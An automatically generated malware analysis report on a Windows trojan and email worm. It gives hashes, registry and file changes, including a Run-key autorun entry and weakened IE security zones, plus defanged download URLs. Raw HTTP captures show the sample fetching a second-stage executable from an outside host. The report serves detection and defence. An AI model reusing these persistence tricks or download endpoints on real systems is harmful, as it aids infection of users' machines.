Gen.Variant.Kazy.140255_ad6f4f9dc2

by malwarelabrobot on September 18th, 2014 in Malware Descriptions.

Gen:Variant.Kazy.140255 (B) (Emsisoft), Gen:Variant.Kazy.140255 (AdAware), Trojan.Win32.Delphi.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, mzpefinder_pcap_file.YR, GenericEmailWorm.YR, GenericPhysicalDrive0.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan, Worm, EmailWorm, VirTool


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: ad6f4f9dc287e200571217a14b37266e
SHA1: 602d8e6a3582a93529eb96cbbcb58b9c7a73e018
SHA256: 7f6f40737b744a298d4dcc9d7690de7adbeb42459fbb5435e8daefce797e36a0
SSDeep: 49152:Oxqpaatu0szNKnhpFjuzlWOwvIy12 ZBLHlA56eiLCQbGXt2AEA9 Vn4:OxqH9CNMT9uzlWZIy12mBTslxtXs/
Size: 2670592 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6, BorlandDelphi30, ACProtect141
Company: no certificate found
Created at: 2014-09-06 05:01:08
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Behaviour Description
EmailWorm Worm can send e-mails.


Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

%original file name%.exe:912

Mutexes

The following mutexes were created/opened:

oleacc-msaa-loaded
CTF.TMD.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
CTF.Layouts.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
CTF.Asm.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
CTF.Compart.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
CTF.LBES.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
ZonesLockedCacheCounterMutex
ZonesCacheCounterMutex
ZonesCounterMutex
WininetProxyRegistryMutex
WininetConnectionMutex
WininetStartupMutex
c:!documents and settings!adm!local settings!history!history.ie5!
c:!documents and settings!adm!cookies!
c:!documents and settings!adm!local settings!temporary internet files!content.ie5!
_!MSFTHISTORY!_
RasPbFile
ShimCacheMutex

File activity

The process %original file name%.exe:912 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\gengxin[1].htm (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\core[1].php (751 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\config[1].htm (25 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cnzz[1].txt (165 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\stat[1].php (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\gengxin[1].htm (1 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (205 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (4144 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\online_v3[1].htm (821 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (254 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@mmstat[1].txt (170 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\stat[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Desktop\ÍøÖ·µ¼º½.lnk (729 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\gengxin[1].htm (0 bytes)

Registry activity

The process %original file name%.exe:912 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCR\TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32]
"(Default)" = "%System%\oleacc.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DF 9B 0E 1C 39 8A 85 C9 DF B2 65 21 41 C4 11 BE"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "http://www.2345.com/?26263"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Play_Background_Sounds" = "yes"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"smss" = "c:\smss.exe"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5 File path
de32c805faf691d75b9e9a773d40d61f c:\BlueSoftSetup_bszfp.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name: ????1.4
Product Version: 1.4.0.0
Legal Copyright: ?????? ????????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.4.0.0
File Description: ????
Comments: ????
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
4096 761856 327680 5.54043 64a41e7c611cad6dd7855ef00f6855ab
765952 1007616 1007616 5.54507 68fa0389d49f90d95745825fe31142db
1773568 286720 28672 5.20516 40dd4ddd102ccce120b455dd230770a0
2060288 24576 4096 5.36001 9f8fdb10d211b8a5fef2889e53650ee4
.rsrc 2084864 12288 12288 3.52559 3d1b940bf21af513e3a1709b511d2c3d
2097152 2838528 172032 5.53463 074ff17fa0de1aa409a36d009f74f92e
.data 4935680 1114112 1114112 5.52146 74af06925d64a815200fe8cd2da8582b

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://222.191.251.197/updata/shuai/BlueSoftSetup_bszfp.exe
hxxp://www.zhanzhangsoft.com/updata/shuai/BlueSoftSetup_bszfp.exe


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET POLICY Unsupported/Fake Internet Explorer Version MSIE 5.
ET POLICY Windows 98 User-Agent Detected - Possible Malware or Non-Updated System

Traffic

GET /updata/shuai/BlueSoftSetup_bszfp.exe HTTP/1.1
Host: VVV.zhanzhangsoft.com
Accept: */*
Referer: hXXp://VVV.zhanzhangsoft.com/updata/shuai
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Range: bytes=13994679-
Pragma: no-cache
Cache-Control: no-cache
Connection: close


HTTP/1.1 206 Partial Content
Connection: close
Date: Wed, 17 Sep 2014 07:59:34 GMT
Content-Length: 32654253
Content-Type: application/octet-stream
Content-Location: hXXp://VVV.zhanzhangsoft.com/updata/shuai/BlueSoftSetup_bszfp.exe
Content-Range: bytes 13994679-46648931/46648932
Last-Modified: Mon, 01 Sep 2014 01:41:18 GMT
Accept-Ranges: bytes
ETag: "16e222d385c5cf1:413e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
.M..d.h.#}.!...(f\r'[email protected]#[email protected]......?...
.C..9.W.._..p......5....m..X.....HS...N.R.....DStY0.. ....0....c..;(&l
t;._.Lz...H.`....q<..V .....0.....^.A..... $.. ...D[.}..ZN.....b..d
.........|Z0 ..`w.P.5G.C..~7'.<..._c....(.].#.]0.B1.o..........{d.r
l..  .:.x....X.Co..k...$*... .d.D.T......>...P..h....&)N..Q....5'..
...`o8,. ..n.......E.;vF..2.{.j..=-..J...^S..b:..i.S..:.p.......A.nP.8
..{m4.^.ne.....1T.y..|.eR...m.......j...6.t..O.4..~h.}.4..L..y..p.d_..
.j.._....U..0.Tmd..A!f#.-...d.G..........:...k(ud.....f.k.&.1S..e...{.
R 7...lK.T.Q.....Y.......n.x.!.L.;Oa>y...J...J.......Ay.|.S........
....7j..K|.[.F..i......R.@.`.....Z.4.g.....`....j..<,.`.Azm......c.
.%.......S'.....3.E..L&...qa.|.........R...''.$.E.....8;.Z......;.nvA.
?..ts]..w;.....2...h........~....^G...K5...R.88..h..| ^.X#.!x......$&l
t;<BzP.. .E..3..[E..L....1..%..:.#1../...%..f:L..]..?.).m...e..B8..
M......:[email protected]....?..o.Vj6X....%j....p..J......Oy..#....QB}.../..2..
>@......Nb.....H.....-......"...D..C.,/..`.*_.&#.lL`..k..x..#.."B..
..z.........>.!...H....0H....3.....;...X&..M.X!..N\.p.bp...!../....
.#..hC..*...o......f.......W..hZ. KK^.D1.....8.Z..$...H.....O...O&...F
...%os..;{J..p8.WO....K.......0..`......U.A....k.. . !....L..'...urb..
. ....}6V...........)j........./d.U..s.2.s.W B..=..k.sP...8L:3.k....=.
..omX...o.#.-..O:.f..^...W [email protected]&.........54...<...3%....
.D......'7B........#.....%..0....ZYf...u..............R.../J..{.V1.f.S
q(..gc...P..2...w.d...Z.|"T..m[[email protected].?.....X.'.1..
<<< skipped >>>


GET /updata/shuai/BlueSoftSetup_bszfp.exe HTTP/1.1
Host: VVV.zhanzhangsoft.com
Accept: */*
Referer: hXXp://VVV.zhanzhangsoft.com/updata/shuai
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Range: bytes=23324465-
Pragma: no-cache
Cache-Control: no-cache
Connection: close


HTTP/1.1 206 Partial Content
Connection: close
Date: Wed, 17 Sep 2014 07:59:46 GMT
Content-Length: 23324467
Content-Type: application/octet-stream
Content-Location: hXXp://VVV.zhanzhangsoft.com/updata/shuai/BlueSoftSetup_bszfp.exe
Content-Range: bytes 23324465-46648931/46648932
Last-Modified: Mon, 01 Sep 2014 01:41:18 GMT
Accept-Ranges: bytes
ETag: "16e222d385c5cf1:413e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
..)...c.......}. 2#:.<....6,.D{A}.%......">r..0.x..7...yk.>.x
..oF..3...."...O..1 ./o..`)...2cw:'.q.....HN....K.b.jX....1_...m..)_.|
......K....7f...:...j...{.V6...3e...1.......K.qn.q..lu..5..%..8?.q..4\
..T....^.f.7.G.c.......[.vD...O..h....T..t.>P....R(y.R.l.*1......f.
.`...Sg.E..5J.uL?.WT..$"1.).~Q..q....hg.,..T...1..:..A.B.a~<:B$q...
[email protected].. ..B..H..... .ic..)@U..O I..}.9.b..xs.?.b.....2
[email protected]....}.v ..PI.!.....u....[&&.....A.....<..`oC.....SE-.
. vF.R...%.r.0#...BJbH....v....1...r0..d.....CI..qN..H...|.2...7u.!..&
)...#._..]...r'T7d.5h`u...w........\>.R~/P?........z..P..b...J...(}
B.#..rK8...=.m..42z.N..._......_.I..G...A..|. k..s.^...V]O..&..b/..$QP
 .......q..?...*.u.o9.....b...z..M.-A..b.^.$.0yuJ#...M8.... j..I...*..
K..:...x.I2..._s..<..6..?.......m.8Q..K.../Q6..../.............r...
.zE./.V.G...3.e.Q....7L.F^.i.x............u..'.*..=.s.....,.ra..H`....
e..."....%.. .f.*9kQ...W.?.O2.....3...Py.h....|.....U.9.......&.,...*.
.!{^.].....un4..:.....P...m...-...........&G..^).I...=.<.)...r.....
....0.[..r...!.....1....d..B..........v.."..J..y.^...UN..R..~..~.%....
.'.....w......W..q<..f...C.....K~B....RN{n ..!...~.TJ.._V.9^.,.x..`
...dLB1{.. U.n..E.*..O{#...f...[7M!p...I..u-.|.oAw.o...o=.R~}0....^...
........L[.s5.....'2($%r.....{&.2..^..E5 C.6/..z....a....A..G....q.&{.
...Eo5.b.mD..9.W.47)....y...6.`.......,q..........ER.......Y_...wy|q..
.}.W.].R....?.:'5..<.MV..;..N..?G((.`.V5...C....e7:X.....HC.&w$....
....qG..S..[l.<f...u....`../.._..y...n...rV4..#..{.8....U.f.cD.
<<< skipped >>>


GET /updata/shuai/BlueSoftSetup_bszfp.exe HTTP/1.1
Host: VVV.zhanzhangsoft.com
Accept: */*
Referer: hXXp://VVV.zhanzhangsoft.com/updata/shuai
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Range: bytes=23336297-
Pragma: no-cache
Cache-Control: no-cache
Connection: close


HTTP/1.1 206 Partial Content
Connection: close
Date: Wed, 17 Sep 2014 08:00:41 GMT
Content-Length: 23312635
Content-Type: application/octet-stream
Content-Location: hXXp://VVV.zhanzhangsoft.com/updata/shuai/BlueSoftSetup_bszfp.exe
Content-Range: bytes 23336297-46648931/46648932
Last-Modified: Mon, 01 Sep 2014 01:41:18 GMT
Accept-Ranges: bytes
ETag: "16e222d385c5cf1:413e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
/.AiC...s.K....2...(...y\bS11(.(i{...........Q..e.G\..........$......]
i(..0..|.o...=I......h..`...Vk.,.n.n.a.u..F.TY....k..#o....=.,..~...J.
T!.=..*.S.....g...M.N6...<....t............>x.}E.7.s.....ZS....v
'6..].4...3..=.L....]....tm|Z...X...Vr.A............V.Q.l.?.....&0...@
:.*...............^Ot[.V.t.....r.'V^......-.%.....e..........$.FL...R.
[...K.:]..'..O;.-....YTi..,p9.D....C..R.....H8n...ozVs....L..h.|k1...F
....d(....~.%m..H}....<%..m.xgf.F.G...`..22.W.eX_!...X......s.C..3.
s..)q..T#rA..}.b../.fo....i5..`..4%.y....^..V......If....I=......O.P1.
h.d .Z.*.}z..1.>...7$ ..).H.pY...R....).BT?`Px.;%..x.TL}6.T..3R.M..
.,[email protected]<&(..a......~.g..^DV..4...._.(....~..l.$q6](.F...
Em..v..a.=.....d`......y.VD_C.S..`i..g..Yt.n.{.Wq..,4....u.v./...7k7~.
I.C.h..D.s`.^...>E../Q.P...xx|>...oK@6i.|.sAm..c....>.?.=^...
..f.e..k..'..;d.U..L....D.lt.....!...$mW.;D..r.....{.f.......A.......\
.....j....GBO.@....'..$..$....8&A..rJ.#...>8..P..Q}?............H..
.7.3.........u.s.t.Qy>../?.o.#....0D...%.`MD.. 2.j.....{...p.q...u.
...AT Fn...J/..'.......X[...GN...'A....Dj$.R...T%s.......,....(../...p
Om.Z..{.m..A._6......?.....6.B.......Du#....f.....0j. ............2.Q.
...'........w&....1"0....u.e.....p..st.I/..u...X.6..S..9..8."49..'..P.
.\....!M.a..,.............=.....d.H.`.i].M.......q...S....t.4.Z1F.....
T......IK, ._......\.wN|/3L..#....&.W..<@[email protected]
..0.1...dA....U~..>.|....{`..VNI4f..H.#...R.X...1......(QMpC..~..L.
.CH.~..:.-i..F>%}..6q......`.[.q.Z.!.OS..".R.._.W..nl.....d....
<<< skipped >>>


GET /updata/shuai/BlueSoftSetup_bszfp.exe HTTP/1.1
Host: VVV.zhanzhangsoft.com
Accept: */*
Referer: hXXp://VVV.zhanzhangsoft.com/updata/shuai
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Range: bytes=42403138-
Pragma: no-cache
Cache-Control: no-cache
Connection: close


HTTP/1.1 206 Partial Content
Connection: close
Date: Wed, 17 Sep 2014 08:00:17 GMT
Content-Length: 4245794
Content-Type: application/octet-stream
Content-Location: hXXp://VVV.zhanzhangsoft.com/updata/shuai/BlueSoftSetup_bszfp.exe
Content-Range: bytes 42403138-46648931/46648932
Last-Modified: Mon, 01 Sep 2014 01:41:18 GMT
Accept-Ranges: bytes
ETag: "16e222d385c5cf1:413e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
.@:,sOu...._....Ry/...c..:c..O..y..E.. P.`-...l.1..G9.H..c...oG.>..
AS.I]q..i...I...`.5,..w.....=....X.Z.......}.r'....c....2..m.....azw~.
..q.A........Y....RX..... ].8=W.v/x..aN.2.....N......>..L<.U.LP.
..s6.9.o.X,.c.L..x.X.......\....n!5....)?..-h.K.Z#...&1.....1"...U.m..
..Z<..>na.........\.9.#....w.....'..9.U..!.....fh~..{4.x.......s
...RI.............?.E...q5....MP...PL.....bQCz....Y...u.A..%.Vf.fE.49.
..!%......_......1I<*. A....`.R..$..-;.`3...y.u.X.x.cb,|.z...*[email protected]
"...W4RW..[...b2.,..I{...v/.........1i..a.......3...RN..-p#S.q.E...-..
.....Z..v.s*;.IW.....i..# .vJ/}f.U..S.82W(.1..r....U..Py..8...CI....V.
........P=.>`..9~l.T........n|...Ul...Uc?4...3h...\.2../........w:.
.Z.......N.62K..2.5L.....Jz..=..$.[...."..G.6....<....I..ooTp....."
P$j{..H|.9XV.L...s.......@O2_.S.g..9..l...R.Qa...=O.?.Q....._4...~.T..
.K.....c#i%...u...7P.*..._.....\a.M. )....e"..... CJ....S.dm\...>..
fY2.Gv_..T\...=..0...Y.f..s...UCg..]Sj.7.r.\lpf?:..HV....M1..m..f.....
........b..7I..R%.....a.7.....B........l..........z.i..t&...IUg.!..c..
.....}......).$......Vd.<n...B.G9/........1......V...p......*l.*-..
d.#.D"....,7.m.........xw.... .D..>...,.."lK,..b.#_H.............V.
..).. X.:.Q..1S4.....J.o>.i.h.a.JHr.NF....T...I.#pH.7..:..{e.k....6
..O/...&....Z..}.|.... ...w.&D[9...cBz#kv8...DE.G5/....pK............a
...~..w..(.o.....T...Y.`....d....N./.."......F.&.QN/..m.t_A.b..(.k.w#H
.E....I=.V.,AZ.A...e.d.Y..|..W......D..X.z.....T3...Le.(...{.Rt..[.j..
r...7....d....:..a.yT..>[email protected]|.tb......a.........
<<< skipped >>>


GET /updata/shuai/BlueSoftSetup_bszfp.exe HTTP/1.1
Host: VVV.zhanzhangsoft.com
Accept: */*
Referer: hXXp://VVV.zhanzhangsoft.com/updata/shuai
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Range: bytes=32906591-
Pragma: no-cache
Cache-Control: no-cache
Connection: close

GET /updata/shuai/BlueSoftSetup_bszfp.exe HTTP/1.1
Host: VVV.zhanzhangsoft.com
Accept: */*
Referer: hXXp://VVV.zhanzhangsoft.com/updata/shuai
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Range: bytes=32906591-
Pragma: no-cache
Cache-Control: no-cache
Connection: close


HTTP/1.1 206 Partial Content
Connection: close
Date: Wed, 17 Sep 2014 08:00:18 GMT
Content-Length: 13742341
Content-Type: application/octet-stream
Content-Location: hXXp://VVV.zhanzhangsoft.com/updata/shuai/BlueSoftSetup_bszfp.exe
Content-Range: bytes 32906591-46648931/46648932
Last-Modified: Mon, 01 Sep 2014 01:41:18 GMT
Accept-Ranges: bytes
ETag: "16e222d385c5cf1:413e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
......O!..t.[DP.Z_...\..@p.........#.M.jH.G.3..j.........0....#.......
 K.9..R. @.Oz...u..?x....].V..G...~.Y......fc).=......,..4...........A
dfQ_.Q.s...3{5.C.<C%.......i.......RLT.x..*:.}.rh.5.>r.5.j}%..F.
>....3nW.VH.;..N.ah.J..b.sA.0.d>..........I..2...[.L.j.;J....[.,
.u..x...1r....^.0.loh.$Yt{cHx.W......0../#3. .Z8p.s..'...Rg....d..0...
&...y......L......04mk[..?~.{Z..T..1..|z..f...7...Dd..........xS..w.U.
.n.......W..I6....HB>....O{.:..q.~D..#Y....*...5.}....s.p...Y.>.
>.X..J..ZR.\]!.|_..f......<t..R....GB. .[Ak..P..{F/.Y.?..hkRn...
Zp.....[....G..YA..*.CdaC(*~..<!....M...>i)....g.-.~.H...&p.....
...k$...|...)....25...P...{.......[.*K#.d....p..e...O.?.9f..I..CK.....
4..`.N..F...`.`X*.@P.]W.L.bm^..6.D.) ....fI..T).4..Ip...1.)..b.d......
}....e.k....C.p........<(.,.i.i.n..O...-H.&o..K.. b.....{[4.e`...t.
v.G)...T.x.~...J..?Zf^]8.......|...!.0.p...F..GAZ!.$..;.D.`...H....6.G
L..@Zw....>1pf...q.m....[l.s'4b3.X..C...R2...c......9 ...ft...cL..&
.UU.,[email protected]....[S$#..r4V...J ....;........).....B..o..n..2..."H......y
GM.5..!...L.R.{~.VM...u..[./.MB>1r.......^..T.9...NJO...2..Q(.Sy$(7
-F.8.........t....A.ukl...ll...|k..f Q.qf...)[.?..n.!...;..{..5#~.A...
Xj.*..v#U0....;\......8..-.<...U..x....5....ob.....l.FW...2Wa...h..
..RD ..9p4......&.O.............Zq#..8.....#0D.Y. .I?..Zj..-c.(.......
S.Z...f..A.c...K..|...@.=..V;.......y.&..u...'.[.cI....!.O..=S}A...*F.
._N...l...t.N..r.Sh.>.-..Y?..*W..M.d..$.Q...1...d_. .o..MM*..:...[.
.v.U.....{n....3.V...q...~w.WZ..Vll.....8Q....F.>>.0...Q]I4.
<<< skipped >>>


GET /updata/shuai/BlueSoftSetup_bszfp.exe HTTP/1.1
Host: VVV.zhanzhangsoft.com
Accept: */*
Referer: hXXp://VVV.zhanzhangsoft.com/updata/shuai
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Range: bytes=14005051-
Pragma: no-cache
Cache-Control: no-cache
Connection: close


HTTP/1.1 206 Partial Content
Connection: close
Date: Wed, 17 Sep 2014 08:00:09 GMT
Content-Length: 32643881
Content-Type: application/octet-stream
Content-Location: hXXp://VVV.zhanzhangsoft.com/updata/shuai/BlueSoftSetup_bszfp.exe
Content-Range: bytes 14005051-46648931/46648932
Last-Modified: Mon, 01 Sep 2014 01:41:18 GMT
Accept-Ranges: bytes
ETag: "16e222d385c5cf1:413e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p..W...y.../..B..^[email protected].........?Q..|....../...#4hc....&......Q...^
g.ipf.".d,.h. ../.h..:..\..............?.c.E.xY.x..Ghw. ..K..l.}v.Te..
.P...^.)m.....`..........5. [email protected]
.?.}.."'......lx..F.._dW.T....M:..x...\i.$I..^.=....B.......eI.......j
../3....|r.^.....q..|[..a.>.. ..%..*Z..".. .(C9K..=.P..... d. l...B
.(>.c...Q..*...v.{....[..O.=..#}\[email protected].)...|(S^.....:qFw.Z.....Rv
..D...{ .A~.)...%./..4.f..%......5.;O..W..#...E.?.....c..%.c;.$..?.E.r
o.W#o@..#.q....(.K..#...:R$Bf..*.vz.*4(e^..^.y*`s.....=.....Ux...R....
&.[... ....A.Q......z..j....g'.z...n......%....\.S.R.f...v...5T..^z2ch
.&...........2. ..5_...i.Kj.....T....q.j...Z...v...C.......'.P.....1..
...l..0..(.....}...J.\z.D.X[...... .X5g...&H..Z.b:..8..k..H...x..9.Y..
.Y....N.{.b.?2L.,.C(.:...Un.3...j/#c.../.......i.....&6...{..._F..^...
.f..*.7.../Y|.}..p.o..1n.NQ^.................9.U..t.....N.~.........0.
?D.,..|..#.x.(.....&..[..K.#p4....g#j...z....>. ..e........H}.!....
.5....(....,".K..A3.. '.A..~\.L..*....s.[.zS..d..../...z.iOk..9..t].(.
.XR.@iVo .m..E.>...A.$5.T...qE.....N&.`,%..a...o.s..P..{.q....M5.j1
A*.n../q...'.3.m.U.H../.XT"E.......y......<.c.]5O.T.....S..C?....M.
.v`.(.Vj.b...7.x.9...............u......j4E.>...&?.d.....v1O....$..
;[email protected].\m~..|.T.. K.....v.......O.....r&.........E...X.z.S..#.i.
..:i..pT...^.....`~.s....$B.9si.;K:...X...ac..\b......6'=|]K........|h
...'.Y........,....".A./.../.].t.3'.p...B...5..d......L.....<c..1 B
..gh7 ..&....%.u...e"..]...l..VMB......a....0..?C.z..._../.&.a....
<<< skipped >>>


GET /updata/shuai/BlueSoftSetup_bszfp.exe HTTP/1.1
Host: VVV.zhanzhangsoft.com
Accept: */*
Referer: hXXp://VVV.zhanzhangsoft.com/updata/shuai
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Range: bytes=28280610-
Pragma: no-cache
Cache-Control: no-cache
Connection: close

